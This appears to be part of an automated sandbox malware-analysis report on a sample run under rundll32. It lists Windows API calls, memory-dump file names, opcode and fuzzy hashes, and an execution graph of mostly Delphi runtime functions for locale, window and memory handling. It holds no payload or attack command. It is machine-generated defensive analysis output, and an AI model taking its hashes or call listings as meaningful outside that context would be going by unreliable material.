                              • Opcode Fuzzy Hash: c66a629ae7f826558553e15b56516e264a872502fc01bc88fdd4db5682d9bbac
                              • Instruction Fuzzy Hash: 6DD0C270764304BEF2163B608C12B6A3B68D34DF2DF820420F900628C08896746088B9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 03FFDD89
                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 03FFDDE7
                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 03FFDE44
                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 03FFDE77
                                • Part of subcall function 03FFDD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,03FFDDF5), ref: 03FFDD4B
                                • Part of subcall function 03FFDD34: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,03FFDDF5), ref: 03FFDD68
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$LanguagesPreferred$Language
                              • String ID:
                              • API String ID: 2255706666-0
                              • Opcode ID: a24eae42f5fd1e36702fb6905f0a5bf3689bfebe41d5c5bc2bb91761f3197cd1
                              • Instruction ID: d9ff7b55ef6ee8c1d493db7fea14f4014a854f95586fa27dd48046b1d0af9b1c
                              • Opcode Fuzzy Hash: a24eae42f5fd1e36702fb6905f0a5bf3689bfebe41d5c5bc2bb91761f3197cd1
                              • Instruction Fuzzy Hash: 93316E34E0021ADFDB10DFE9C884AAEB3B8FF54314F544565EA11EB2A4EB789A05CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindow.USER32(?,00000004), ref: 041E64E6
                              • GetWindowThreadProcessId.USER32(?,?), ref: 041E6503
                              • GetCurrentProcessId.KERNEL32(?,00000004), ref: 041E650F
                              • IsWindowVisible.USER32(?), ref: 041E6569
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$Process$CurrentThreadVisible
                              • String ID:
                              • API String ID: 3926708836-0
                              • Opcode ID: fa9200a0bb171d73d6ec73c6cb8889388105888694edf41d3b344cec05a11cc1
                              • Instruction ID: 9d339515c2d1101d59fee9a17b1320a84932c3046dee8a3c6e96190819f3ac9f
                              • Opcode Fuzzy Hash: fa9200a0bb171d73d6ec73c6cb8889388105888694edf41d3b344cec05a11cc1
                              • Instruction Fuzzy Hash: 76313A3A7007059BEB50EF5AD8C8AAA73A8EF24354F8481B1ED04E7286DF35FD418B51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetActiveWindow.USER32(?,?,042501D8,041E7DC8), ref: 041E714E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: ActiveWindow
                              • String ID:
                              • API String ID: 2558294473-0
                              • Opcode ID: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction ID: 9c743d7d66b8db9db544a23f32f5f32b4f67f74e75bffa582fa0adba2cef0e13
                              • Opcode Fuzzy Hash: 3a3482db3d3017f85c8397938c9e80ebde1f586c6287a5805f17761587ae5c45
                              • Instruction Fuzzy Hash: 2931EB74600680ABFB54EF69C8C4BAA37966F04308F0844B1AD059F28BDB65FC85C761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(041E61C0), ref: 041E62B1
                              • GetWindow.USER32(00000003,00000003), ref: 041E62C9
                              • GetWindowLongW.USER32(00000000,000000EC), ref: 041E62D6
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 041E6315
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$EnumLongWindows
                              • String ID:
                              • API String ID: 4191631535-0
                              • Opcode ID: 8d6d843c9db75768596233efc5e15de7564f25174fb82e1f2d3c1d61dc2ba37c
                              • Instruction ID: 2fdd549738c4004549fe42f6e854a1d1b8f1ac5c146f41e269917ed8eb90adbd
                              • Opcode Fuzzy Hash: 8d6d843c9db75768596233efc5e15de7564f25174fb82e1f2d3c1d61dc2ba37c
                              • Instruction Fuzzy Hash: 3511A030604B00AFEB10AB28CDC0FAA77D4DF45724F9481B4F998AB2C2C770A841CB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowThreadProcessId.USER32(00000000), ref: 04123E7D
                              • GetCurrentProcessId.KERNEL32(?,?,00000000,041E985D,?,?,?,00000001,041E7A37), ref: 04123E86
                              • GlobalFindAtomW.KERNEL32(00000000), ref: 04123E9B
                              • GetPropW.USER32(00000000,00000000), ref: 04123EB2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                              • String ID:
                              • API String ID: 2582817389-0
                              • Opcode ID: 482d4608fe52eab5c30ab12c26667c008a72f921f9de999cff4154adff3a2da6
                              • Instruction ID: b16edf303dee1473eebff133e1ce88d45793d08d7595bc5200f7a0055b712bab
                              • Opcode Fuzzy Hash: 482d4608fe52eab5c30ab12c26667c008a72f921f9de999cff4154adff3a2da6
                              • Instruction Fuzzy Hash: 43F030713002356ABA61B7B96EC48BF628DCE042AC7044C61FD15D7181DB2EEC6987B4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:2.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:175
                              Total number of Limit Nodes:10
                              execution_graph 9201 4b90898 9204 49519b8 9201->9204 9203 4b908a8 9205 49519c3 9204->9205 9208 494a6f8 9205->9208 9209 494a707 9208->9209 9210 494a70c GetCurrentThreadId 9208->9210 9209->9210 9211 494a742 9210->9211 9212 494aa44 9211->9212 9213 494a7b5 9211->9213 9215 494aa71 9212->9215 9218 494aa60 9212->9218 9227 494a68c 9213->9227 9217 494aa7a GetCurrentThreadId 9215->9217 9221 494aa87 9215->9221 9217->9221 9231 494a9ac 9218->9231 9220 494aa6a 9220->9215 9222 4946f7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 9221->9222 9223 494ab17 FreeLibrary 9221->9223 9224 494ab3f 9221->9224 9222->9221 9223->9221 9225 494ab4e ExitProcess 9224->9225 9226 494ab48 9224->9226 9226->9225 9228 494a6d4 9227->9228 9229 494a69c 9227->9229 9228->9203 9229->9228 9237 49502f4 GetSystemInfo 9229->9237 9232 494a9b6 GetStdHandle WriteFile 9231->9232 9233 494aa13 9231->9233 9238 494b5b8 9232->9238 9233->9220 9236 494aa03 GetStdHandle WriteFile 9236->9220 9237->9229 9239 494b5be 9238->9239 9239->9236 9240 49459b0 9241 4945c10 9240->9241 9242 49459c8 9240->9242 9243 4945d28 9241->9243 9244 4945bd4 9241->9244 9251 49459da 9242->9251 9254 4945a65 Sleep 9242->9254 9245 4945d31 9243->9245 9246 494575c VirtualAlloc 9243->9246 9253 4945bee Sleep 9244->9253 9255 4945c2e 9244->9255 9248 4945797 9246->9248 9249 4945787 9246->9249 9247 49459e9 9264 4945710 9249->9264 9251->9247 9252 4945ac8 9251->9252 9259 4945aa9 Sleep 9251->9259 9263 4945ad4 9252->9263 9269 4945694 9252->9269 9253->9255 9256 4945c04 Sleep 9253->9256 9254->9251 9257 4945a7b Sleep 9254->9257 9258 4945c4c 9255->9258 9260 4945694 VirtualAlloc 9255->9260 9256->9244 9257->9242 9259->9252 9262 4945abf Sleep 9259->9262 9260->9258 9262->9251 9265 4945758 9264->9265 9266 4945719 9264->9266 9265->9248 9266->9265 9267 4945724 Sleep 9266->9267 9267->9265 9268 494573e Sleep 9267->9268 9268->9266 9273 4945628 9269->9273 9271 494569d VirtualAlloc 9272 49456b4 9271->9272 9272->9263 9274 49455c8 9273->9274 9274->9271 9275 494d658 9276 494d668 GetModuleFileNameW 9275->9276 9278 494d684 9275->9278 9279 494e8cc GetModuleFileNameW 9276->9279 9280 494e91a 9279->9280 9285 494e7a8 9280->9285 9282 494e946 9283 494e958 LoadLibraryExW 9282->9283 9284 494e960 9282->9284 9283->9284 9284->9278 9288 494e7c9 9285->9288 9286 494e851 9286->9282 9288->9286 9303 494e4e4 9288->9303 9289 494e83e 9290 494e844 9289->9290 9291 494e853 GetUserDefaultUILanguage 9289->9291 9292 494e610 2 API calls 9290->9292 9307 494de94 EnterCriticalSection 9291->9307 9292->9286 9294 494e860 9327 494e610 9294->9327 9296 494e86d 9297 494e895 9296->9297 9298 494e87b GetSystemDefaultUILanguage 9296->9298 9297->9286 9331 494e6dc 9297->9331 9299 494de94 17 API calls 9298->9299 9301 494e888 9299->9301 9302 494e610 2 API calls 9301->9302 9302->9297 9304 494e506 9303->9304 9306 494e510 9303->9306 9339 494e1c8 9304->9339 9306->9289 9308 494dee0 LeaveCriticalSection 9307->9308 9309 494dec0 9307->9309 9376 494ad14 9308->9376 9311 494ded1 LeaveCriticalSection 9309->9311 9313 494df82 9311->9313 9312 494def1 IsValidLocale 9314 494df00 9312->9314 9315 494df4f EnterCriticalSection 9312->9315 9313->9294 9317 494df14 9314->9317 9318 494df09 9314->9318 9316 494df67 9315->9316 9322 494df78 LeaveCriticalSection 9316->9322 9391 494db7c 9317->9391 9378 494dd78 GetThreadUILanguage 9318->9378 9321 494df1d GetSystemDefaultUILanguage 9321->9315 9323 494df27 9321->9323 9322->9313 9324 494df38 GetSystemDefaultUILanguage 9323->9324 9325 494db7c 3 API calls 9324->9325 9326 494df12 9325->9326 9326->9315 9329 494e62e 9327->9329 9328 494e6a9 9328->9296 9329->9328 9400 494e5a4 9329->9400 9405 494adf8 9331->9405 9334 494e72c 9335 494e5a4 2 API calls 9334->9335 9336 494e740 9335->9336 9337 494e5a4 2 API calls 9336->9337 9338 494e76e 9336->9338 9337->9338 9338->9286 9340 494e1df 9339->9340 9341 494e1f3 GetModuleFileNameW 9340->9341 9342 494e208 9340->9342 9341->9342 9343 494e3d7 9342->9343 9344 494e230 RegOpenKeyExW 9342->9344 9343->9306 9345 494e257 RegOpenKeyExW 9344->9345 9346 494e2f1 9344->9346 9345->9346 9347 494e275 RegOpenKeyExW 9345->9347 9360 494dfd8 GetModuleHandleW 9346->9360 9347->9346 9349 494e293 RegOpenKeyExW 9347->9349 9349->9346 9351 494e2b1 RegOpenKeyExW 9349->9351 9350 494e30f RegQueryValueExW 9352 494e360 RegQueryValueExW 9350->9352 9353 494e32d 9350->9353 9351->9346 9355 494e2cf RegOpenKeyExW 9351->9355 9354 494e37c 9352->9354 9359 494e35e 9352->9359 9356 494e335 RegQueryValueExW 9353->9356 9357 494e384 RegQueryValueExW 9354->9357 9355->9343 9355->9346 9356->9359 9357->9359 9358 494e3c6 RegCloseKey 9358->9306 9359->9358 9361 494e000 GetProcAddress 9360->9361 9362 494e011 9360->9362 9361->9362 9363 494e027 9362->9363 9367 494e073 9362->9367 9372 494dfb4 9362->9372 9363->9350 9366 494dfb4 CharNextW 9366->9367 9367->9363 9368 494dfb4 CharNextW 9367->9368 9369 494e0f8 FindFirstFileW 9367->9369 9371 494e162 lstrlenW 9367->9371 9368->9367 9369->9363 9370 494e114 FindClose lstrlenW 9369->9370 9370->9363 9370->9367 9371->9367 9373 494dfc2 9372->9373 9374 494dfd0 9373->9374 9375 494dfba CharNextW 9373->9375 9374->9363 9374->9366 9375->9373 9377 494ad1a 9376->9377 9377->9312 9379 494dd94 9378->9379 9380 494dded 9378->9380 9396 494dd34 GetThreadPreferredUILanguages 9379->9396 9381 494dd34 2 API calls 9380->9381 9386 494ddf5 9381->9386 9385 494de3c SetThreadPreferredUILanguages 9387 494dd34 2 API calls 9385->9387 9386->9385 9390 494de7d 9386->9390 9388 494de52 9387->9388 9389 494de6d SetThreadPreferredUILanguages 9388->9389 9388->9390 9389->9390 9390->9326 9394 494dbb7 9391->9394 9392 494dc20 IsValidLocale 9393 494dc33 GetLocaleInfoW GetLocaleInfoW 9392->9393 9395 494dc6e 9392->9395 9393->9395 9394->9392 9394->9395 9395->9321 9397 494dd55 9396->9397 9398 494dd6e SetThreadPreferredUILanguages 9396->9398 9399 494dd5e GetThreadPreferredUILanguages 9397->9399 9398->9380 9399->9398 9401 494e5b9 9400->9401 9402 494e5d6 FindFirstFileW 9401->9402 9403 494e5e6 FindClose 9402->9403 9404 494e5ec 9402->9404 9403->9404 9404->9329 9406 494adfc GetUserDefaultUILanguage GetLocaleInfoW 9405->9406 9406->9334

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0494E79C,?,?), ref: 0494E70E
                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0494E79C,?,?), ref: 0494E717
                                • Part of subcall function 0494E5A4: FindFirstFileW.KERNEL32(00000000,?,00000000,0494E602,?,00000001), ref: 0494E5D7
                                • Part of subcall function 0494E5A4: FindClose.KERNEL32(00000000,00000000,?,00000000,0494E602,?,00000001), ref: 0494E5E7
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                              • String ID:
                              • API String ID: 3216391948-0
                              • Opcode ID: 894a7f52e29575dbe6a7bbc5b4ad5eabec5196b9deb59b2c7befc5eb6450e80d
                              • Instruction ID: 4c397d02c032c63903de3d0ba5f53123e50cd9dc50f49ca1e9c07916f7bc2bce
                              • Opcode Fuzzy Hash: 894a7f52e29575dbe6a7bbc5b4ad5eabec5196b9deb59b2c7befc5eb6450e80d
                              • Instruction Fuzzy Hash: 69114F74A00209ABEF04EFE8D891EAEB7B8FFC8318F504475A504A7251DB74BE048A65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0494E602,?,00000001), ref: 0494E5D7
                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0494E602,?,00000001), ref: 0494E5E7
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 6c57c03feedc573902f7354d2c9f0120330c69c5412a071d24e91be9c56fa419
                              • Instruction ID: 346a081a351872336bf6c85192c132f93fa9a16f843a51d44ccc3d1e18ace9bb
                              • Opcode Fuzzy Hash: 6c57c03feedc573902f7354d2c9f0120330c69c5412a071d24e91be9c56fa419
                              • Instruction Fuzzy Hash: A3F0E270514614BFEB50EBB8CC12C5EB7ACEBC8728BA104B0F804D2250E634BF009924
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0494E3ED,?,?), ref: 0494E201
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0494E3ED,?,?), ref: 0494E24A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0494E3ED,?,?), ref: 0494E26C
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0494E28A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0494E2A8
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0494E2C6
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0494E2E4
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0494E3D0,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0494E3ED), ref: 0494E324
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0494E3D0,?,80000001), ref: 0494E34F
                              • RegCloseKey.ADVAPI32(?,0494E3D7,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0494E3D0,?,80000001,Software\Embarcadero\Locales), ref: 0494E3CA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2470563916.0000000004941000.00000020.00000001.01000000.00000003.sdmp, Offset: 04940000, based on PE: true
                              • Associated: 0000000E.00000002.2470545088.0000000004940000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470563916.000000000495C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470746901.0000000004B91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470770395.0000000004B92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470788077.0000000004B93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470806641.0000000004B97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470823834.0000000004B98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470843731.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470862464.0000000004BA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470880072.0000000004BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000E.00000002.2470897017.0000000004BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_14_2_4940000_rundll32.jbxd
                              Similarity
                              • API ID: Open$QueryValue$CloseFileModuleName
                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                              • API String ID: 2701450724-3496071916
                              • Opcode ID: 657fb84281e01f738cc5a50af59e2b88c3e6c1930ba51ac7dbfc33d472265cb1
                              • Instruction ID: 9f6170508d29ca2f572e21de4920e7e1cedd73eae6bd7d33c036e194022a2466
                              • Opcode Fuzzy Hash: 657fb84281e01f738cc5a50af59e2b88c3e6c1930ba51ac7dbfc33d472265cb1
                              • Instruction Fuzzy Hash: B551FE75A4020CBFFB21EAE4CC41FAEB3ACEBC8714F5144B5BA04F6581D6B0BA409A54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • EnterCriticalSection.KERNEL32(04B9CC14,00000000,0494DF98,?,?,?,00000000,?,0494E860,00000000,0494E8BF,?,?,00000000,00000000,00000000), ref: 0494DEB2
                              • LeaveCriticalSection.KERNEL32(04B9CC14,04B9CC14,00000000,0494DF98,?,?,?,00000000,?,0494E860,00000000,0494E8BF,?,?,00000000,00000000), ref: 0494DED6
                              • LeaveCriticalSection.KERNEL32(04B9CC14,04B9CC14,00000000,0494DF98,?,?,?,00000000,?,0494E860,00000000,0494E8BF,?,?,00000000,00000000), ref: 0494DEE5
                              • IsValidLocale.KERNEL32(00000000,00000002,04B9CC14,04B9CC14,00000000,0494DF98,?,?,?,00000000,?,0494E860,00000000,0494E8BF), ref: 0494DEF7
                              • EnterCriticalSection.KERNEL32(04B9CC14,00000000,00000002,04B9CC14,04B9CC14,00000000,0494DF98,?,?,?,00000000,?,0494E860,00000000,0494E8BF), ref: 0494DF54
                              • LeaveCriticalSection.KERNEL32(04B9CC14,04B9CC14,00000000,00000002,04B9CC14,04B9CC14,00000000,0494DF98,?,?,?,00000000,?,0494E860,00000000,0494E8BF), ref: 0494DF7D
                              Strings
                              Memory Dump Source
